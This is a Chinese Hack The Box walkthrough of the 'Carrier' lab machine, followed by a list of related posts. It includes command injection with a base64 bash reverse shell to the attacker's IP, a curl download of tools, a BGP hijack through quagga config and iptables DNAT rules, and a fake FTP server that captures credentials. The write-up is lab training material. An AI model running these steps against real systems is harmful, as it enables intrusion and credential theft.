1. 程式人生 > >【HTB靶場系列】靶機Carrier的滲透測試

【HTB靶場系列】靶機Carrier的滲透測試

__出品|MS08067實驗室(www.ms08067.com)__ `本文作者:大方子(Ms08067實驗室核心成員)` Hack The Box是一個CTF挑戰靶機平臺,線上滲透測試平臺。它能幫助你提升滲透測試技能和黑盒測試技能,它包含了一些不斷更新的挑戰,其中有模擬真實世界場景,也有傾向於CTF風格的挑戰。 **https://www.hackthebox.eu/** ![](https://img2020.cnblogs.com/blog/2289839/202102/2289839-20210221091219307-1366953257.png) 平臺上有很多靶機,從易到難,黑客每入侵一臺機器都會獲得相應積分,通過積分排名設有名人堂。今天要實驗的是靶機Carrier。 ![](https://img2020.cnblogs.com/blog/2289839/202102/2289839-20210221091234314-246816422.png) 目標靶機IP:10.10.10.105 本機IP:10.10.13.133 首先利用Nmap對目標靶機進行資訊收集 ``` nmap -sC -F -sV 10.10.10.105 ``` -sC:通過預設指令碼進行掃描 -sV:掃描目標主機埠上執行軟體的版本 -F:掃描100個最有可能開放的埠 ![](https://img2020.cnblogs.com/blog/2289839/202102/2289839-20210221091309985-878529493.png) 顯示靶機開放了21,22,80,3306埠,但是21,3306埠被過濾了。22埠是SSH需要登陸,我們先從80埠開始看看能不能得到有用的資訊 先開啟網頁,是一個登陸頁面,有2個Error提示45007,45009,去Google查詢類似的關鍵詞發現沒有什麼可用資訊,應該是自定義的WEB框架, ![](https://img2020.cnblogs.com/blog/2289839/202102/2289839-20210221091324180-1595160870.png) 我們用gobuster來進行目錄爆破 ``` gobuster -u http://10.10.10.105 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -q ``` ![](https://img2020.cnblogs.com/blog/2289839/202102/2289839-20210221091350232-508907302.png) 先看下tools **/tools:** ![](https://img2020.cnblogs.com/blog/2289839/202102/2289839-20210221091405279-1826174032.png) 點進去顯示“許可過期,正在退出” 看下doc **/doc:** ![](https://img2020.cnblogs.com/blog/2289839/202102/2289839-20210221091434049-1822551784.png) ![](https://img2020.cnblogs.com/blog/2289839/202102/2289839-20210221091441866-230978588.png) ![](https://img2020.cnblogs.com/blog/2289839/202102/2289839-20210221091447215-229126865.png) 一個網路架構圖還有一個是錯誤程式碼描述的PDF,根據剛剛網頁提示的錯誤程式碼我們查下對應的解釋 Error 4005:守護程序沒有響應 Error 4009:配置中沒有設定預設的使用者名稱和密碼(檢視機箱序列號) 看下/debug ![](https://img2020.cnblogs.com/blog/2289839/202102/2289839-20210221091508801-1983859157.png) 沒有什麼特別有用的資訊 根據那種圖可能還有別的裝置,這樣我想起了snmp服務 所以我們掃下靶機UDP的埠看看有沒有什麼有用的資訊 ``` nmap -sU 10.10.10.105 ``` ![](https://img2020.cnblogs.com/blog/2289839/202102/2289839-20210221091533057-1913601697.png) 果然目標機器是有開啟snmp,那麼我們用snmpwalk來進行弱口令利用 ``` snmpwalk -v 1 -c public 10.10.10.105 ``` ![](https://img2020.cnblogs.com/blog/2289839/202102/2289839-20210221091557805-1622959510.png) 這個NET_45JDX23可能就是所謂的序列號 我們回到登陸進行登陸。 Username:嘗試常見的預設使用者名稱:admin, root Password: NET_45JDX23 ![](https://img2020.cnblogs.com/blog/2289839/202102/2289839-20210221091642372-1162195754.png) 頁面顯示我們的憑證是無效的 ![](https://img2020.cnblogs.com/blog/2289839/202102/2289839-20210221091655364-517295423.png) 我們進入Tickets ![](https://img2020.cnblogs.com/blog/2289839/202102/2289839-20210221091705124-1554120656.png) 通過這條資訊 我們知道了3個網段(大概就是剛剛那個網路架構圖),還有一個FTP:10.120.15.0/24 然後我們在點Diagnosticd,提示我們憑證無效,但是可以使用檢查功能 點下Verify status ![](https://img2020.cnblogs.com/blog/2289839/202102/2289839-20210221091721424-1177323444.png) 這個部分很像是遠端命令執行。 我們用BURP抓包看下資訊 ![](https://img2020.cnblogs.com/blog/2289839/202102/2289839-20210221091733815-1303941945.png) Check用base64轉換下 ![](https://img2020.cnblogs.com/blog/2289839/202102/2289839-20210221091744494-64735187.png) 很明顯這個quagga就是上面輸出資訊的一部分,查詢相關資料,發現這是一款路由器軟體 ![](https://img2020.cnblogs.com/blog/2289839/202102/2289839-20210221091801664-1989770375.png) 那麼我們設定對check這個引數進行攻擊,我們把root的base64編碼寫進去 ![](https://img2020.cnblogs.com/blog/2289839/202102/2289839-20210221091814995-712825191.png) ![](https://img2020.cnblogs.com/blog/2289839/202102/2289839-20210221091819133-536463043.png) 返回資訊如下 ![](https://img2020.cnblogs.com/blog/2289839/202102/2289839-20210221091831849-159181447.png) 那麼我們在試著輸入 root;echo hello ![](https://img2020.cnblogs.com/blog/2289839/202102/2289839-20210221091846539-1192439140.png) ![](https://img2020.cnblogs.com/blog/2289839/202102/2289839-20210221091855153-89600425.png) 如圖發現我們是可以用;進行多語句的執行,那麼我們用bash反彈一個shell 現在用kali監聽下9001 ![](https://img2020.cnblogs.com/blog/2289839/202102/2289839-20210221091909788-2022948616.png) 然後轉換下編碼 ![](https://img2020.cnblogs.com/blog/2289839/202102/2289839-20210221091918255-1103895849.png) 這裡輸出cm9vdDtiYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjEzLjEzMy85MDAxIDA+JjE= 需要注意的是需要把裡面的+和=進入URL編碼轉換才行要不然會出錯 ![](https://img2020.cnblogs.com/blog/2289839/202102/2289839-20210221091930808-936836673.png) 這樣我們就得到一個shell了 ![](https://img2020.cnblogs.com/blog/2289839/202102/2289839-20210221091944152-391306705.png) 這樣我們就可以得到user的flag了 ![](https://img2020.cnblogs.com/blog/2289839/202102/2289839-20210221091956960-2081672368.png) 接下來就是獲得根ROOT的許可權 從之前的資訊我們瞭解到有一臺FTP伺服器:10.120.15.0/24 我們試著ping 10.120.15.1看看能不能ping通 ![](https://img2020.cnblogs.com/blog/2289839/202102/2289839-20210221092013914-1269329789.png) 我們需要在靶機上進行掃描,當然你可以用msf新增路由的方式掃描,這裡我用另一個種方法把nmap的二進位制靜態執行檔案上傳到靶機進行掃描 Github:https://github.com/andrew-d/static-binaries ![](https://img2020.cnblogs.com/blog/2289839/202102/2289839-20210221092037325-1605078948.png) 然後我們用python的SimpleHTTPServer模組建立服務然後靶機去下載這個檔案 ![](https://img2020.cnblogs.com/blog/2289839/202102/2289839-20210221092052292-737476111.png) 然後再靶機分別輸入如下命令 ``` curl http://10.10.13.133:8000/nmap -o nmap chmod +x nmap ``` ![](https://img2020.cnblogs.com/blog/2289839/202102/2289839-20210221092115750-314245522.png) 然後我們執行 ``` ./nmap -p 21 10.120.15.0/24 ``` ![](https://img2020.cnblogs.com/blog/2289839/202102/2289839-20210221092136266-534971559.png) 發現沒有探測到,可能是目標禁止ICMP資料包 那麼我們加個-Pn引數,同時把結果匯出 ``` ./nmap -Pn -vvv -p 21 10.120.15.0/24 --open ``` -Pn:不進行ping直接掃描 -vvv:顯示詳細過程 --open:只顯示埠open狀態資訊 ![](https://img2020.cnblogs.com/blog/2289839/202102/2289839-20210221092206706-756297139.png) 我們發現 10.120.15.10是開放21埠的 然後我們嘗試下FTP匿名登陸,登陸的時候可能不會有回顯,需要自己打 ![](https://img2020.cnblogs.com/blog/2289839/202102/2289839-20210221092218916-1263235399.png) 無法執行,之前那個ticks也說這個FTP出現了問題。 我們需要通過劫持BGP欺騙AS200將資料傳輸給我們的靶機,然後開啟假的FTP服務,之前的資訊有顯示到有人會定期訪問這個FTP,這樣我們就可以竊取到憑證 ![](https://img2020.cnblogs.com/blog/2289839/202102/2289839-20210221092236559-410158695.png) ![](https://img2020.cnblogs.com/blog/2289839/202102/2289839-20210221092241138-544540581.png) 現在的情況大概就是圖上這個樣子 我們在終端分別輸入 ``` vtysh (quagga的命令) configure terminal(進入配置模式) do show run (顯示配置資訊) ``` ![](https://img2020.cnblogs.com/blog/2289839/202102/2289839-20210221092324939-843080158.png) 我們需要增加一個network就是把剛剛FTP的那個網段加進來 這裡我直接編輯/etc/ quagga下的bgpd.conf檔案內容也就上面顯示的內容 ![](https://img2020.cnblogs.com/blog/2289839/202102/2289839-20210221092346714-1088886559.png) 我們在自己的kali上編輯下內容在裡面加一條10.120.15.0/25 ![](https://img2020.cnblogs.com/blog/2289839/202102/2289839-20210221092401609-265216601.png) 然後用python的SimpleHTTPServer服務上傳到靶機裡面去跟nmap一樣 把之前的檔案重新命名,然後把我們的檔案下載下來 ``` curl http://10.10.13.133:8000/bgpd.conf -o bgpd.con ``` ![](https://img2020.cnblogs.com/blog/2289839/202102/2289839-20210221092420468-1881762792.png) 然後在iptales上新增記錄並重啟quagga服務 ``` iptables -t nat -A PREROUTING -p tcp --dport 21 -j DNAT --to-destination 10.10.14.65:21 iptables -t nat -A POSTROUTING -j MASQUERADE service quagga restart ``` 然後我們在下載一個假的ftp監聽21埠來得到憑證 Github:https://github.com/b1ngda0/FtpServicePython/ ![](https://img2020.cnblogs.com/blog/2289839/202102/2289839-20210221092449620-1749247448.png) 不久後就能得到賬號密碼 root:BGPtelc0rout1ng 然後ssh登陸並得到root flag ![](https://img2020.cnblogs.com/blog/2289839/202102/2289839-20210221092506818-644183167.png) ![](https://img2020.cnblogs.com/blog/2289839/202102/2289839-20210221092510438-384054028.png) **轉載請聯絡作者並註明出處!** Ms08067安全實驗室專注於網路安全知識的普及和培訓。團隊已出版《Web安全攻防:滲透測試實戰指南》,《內網安全攻防:滲透測試實戰指南》,《Python安全攻防:滲透測試實戰指南》,《Java程式碼安全審計(入門篇)》等書籍。 團隊公眾號定期分享關於CTF靶場、內網滲透、APT方面技術乾貨,從零開始、以實戰落地為主,致力於做一個實用的乾貨分享型公眾號。 官方網站:https://www.ms08067.com/ 掃描下方二維碼加入實驗室VIP社群 加入後邀請加入內部VIP群,內部微信群永久有效!

相關推薦

HTB靶場系列靶機Carrier滲透測試

__出品|MS08067實驗室(www.ms08067.com)__ `本文作者:大方子(Ms08067實驗室核心成員)` Hack The Box是一個CTF挑戰靶機平臺,線上滲透測試平臺。它能幫助你提升滲透測試技能和黑盒測試技能,它包含了一些不斷更新的挑戰,其中有模擬真實世界場景,也有傾向於CTF風格

HTB系列靶機Access的滲透測試詳解

__出品|MS08067實驗室(www.ms08067.com)__ `本文作者:大方子(Ms08067實驗室核心成員)` Hack The Box是一個CTF挑戰靶機平臺,線上滲透測試平臺。它能幫助你提升滲透測試技能和黑盒測試技能,它包含了一些不斷更新的挑戰,其中有模擬真實世界場景,也有傾向於CTF風格

HTB系列靶機Chaos的滲透測試詳解

__出品|MS08067實驗室(www.ms08067.com)__ `本文作者:大方子(Ms08067實驗室核心成員)` **知識點:** 1. 通過域名或者IP可能會得到網站的不同響應 2. Wpscan的掃描wordpress 3. 修改hosts來對網頁郵件系統webmail進行訪問 4. LaT

HTB系列 靶機Swagshop的滲透測試詳解

__出品|MS08067實驗室(www.ms08067.com)__ `本文作者:是大方子(Ms08067實驗室核心成員)` **總結與反思** * 使用vi提權 * magento漏洞的利用 * magescan 工具的使用 **靶機介紹** ![](https://img2020.cnblogs.

HTB系列靶機Bitlab的滲透測試

__出品|MS08067實驗室(www.ms08067.com)__ `本文作者:是大方子(Ms08067實驗室核心成員)` ##0x00 本文目錄 * 反思與總結 * 基本資訊 * 滲透測試過程 * 補充 ##0x01 反思與總結 1. curl 傳送GET引數化請求 2. 對反彈回來的shell進行

iOS開發系列九宮格布局

使用 objc with div self. orm i++ back hab /** * 這個盡管非常easy,算是一個小技巧,可是碰到了就記錄下來吧.積跬步,致千裏嘛. */ - (void)scratchableLatex { for (int i=

JVM命令系列jmap

mark bsp null 參考 nfa location bootstra 內容 遠程debug 命令基本概述 Jmap是一個可以輸出所有內存中對象的工具,甚至可以將VM 中的heap,以二進制輸出成文本。打印出某個java進程(使用pid)內存內的,所有‘對象’的情況(

iOS開發系列NSObject方法介紹

ati ber oid ring cto rgb dst -s 推斷 NSObject是OC中的基類,全部類都繼承於此,這裏面也給我們提供了非常多與“類”和“方法”相關的方法,本文將解說幾個非常有用的方法。 正文: Per

大數據系列HDFS文件權限和安全模式、安裝

重新啟動 inux 客戶 元數據 masters cnblogs 格式 新的 檢測 HDFS文件權限 1、與linux文件權限類型 r:read w:write x:execute權限x對於文件忽略,對於文件夾表示是否允許訪問其內容 2、如果linux系統用戶sanglp

大數據系列MapReduce示例好友推薦

trac [0 ont protect run task main orm pat package org.slp; import org.apache.hadoop.io.LongWritable; import org.apache.hadoop.io.Text;

大數據系列在hadoop2.8.0下配置SecondaryNameNode

hadoop .cn color dfs repl images replicat style 節點 修改namenode上的hdfs-site.xml configuration> <property> <name>dfs.r

SignalR學習系列4. SignalR廣播程序

back aspnet ocs || tutorial strong family load over 創建項目 創建一個空的 Web 項目,並在 Nuget 裏面添加 SignalR,jQuery UI 包,添加以後項目裏包含了 jQuery,jQuery.UI ,和

Owin 學習系列1. 第一個 Owin 程序

進程 task reading 地址 [] 地址欄 urn rtu () IIS 中的 Owin 在 IIS 裏面部署 Owin,既能得到 Owin 管道模型的靈活性和模塊特性,也能很好地利用 IIS 成熟的配置,Owin 程序將會跑在 ASP.NET reques

問題記錄系列the resource is not on the build path of a java project

搭建 關閉 spring源碼 remove 環境 eclips 右鍵 生產 ldp 在eclipse中新建了一個maven項目搭建Spring源碼閱讀環境,創建一個bean生產getter和setter方法的時候報錯“the resource is not on the b

表格建模系列二、添加數據

geography custom img eof pan ipaddress customer fwe ebr 加載如下表並清空相應字段: DimCustomer清除字段: SpanishEducation, FrenchEducation, SpanishOccupati

表格建模系列五、創建分區

ant ntp amt intern cost track end pct 2-0 右鍵單擊FactInternetSales > 分區。 創建如下分區: FactInternetSales2010。SQL: SELECT [dbo].[FactInterne

安全牛學習筆記Kali Linux滲透測試方法

信息安全 kali linux security+ 1.安全問題的根源①由於分層思想,導致每個層次的相關人員都只關心自己層次的工作,因此每個人認識系統都是片面的,而安全是全方位的,整體的,所以造成安全問題。②技術人員追求效率,導致只追求功能實現,而很容易忽略安全性的工作③由於人都是會犯錯誤的,因此

深度學習系列用PaddlePaddle和Tensorflow實現經典CNN網絡GoogLeNet

mage eat oba card fin filter mod 一個 lec   前面講了LeNet、AlexNet和Vgg,這周來講講GoogLeNet。GoogLeNet是由google的Christian Szegedy等人在2014年的論文《Going Deepe

深度學習系列用PaddlePaddle和Tensorflow實現GoogLeNet InceptionV2/V3/V4

targe 所有 conn ride 出了 prev 縮減 tro 例如   上一篇文章我們引出了GoogLeNet InceptionV1的網絡結構,這篇文章中我們會詳細講到Inception V2/V3/V4的發展歷程以及它們的網絡結構和亮點。 GoogLeNet I

ASP.NET系列詳解Views

rbo mode 轉義 顯示 ora style i++ 直觀 pre 描述 本片文章內容屬於ASP.NET MVC系列視圖篇,主要講解View,大致內容如下: 1.Views文件夾講解 2.View種類 3.Razor語法 4.對視圖的基本操作 一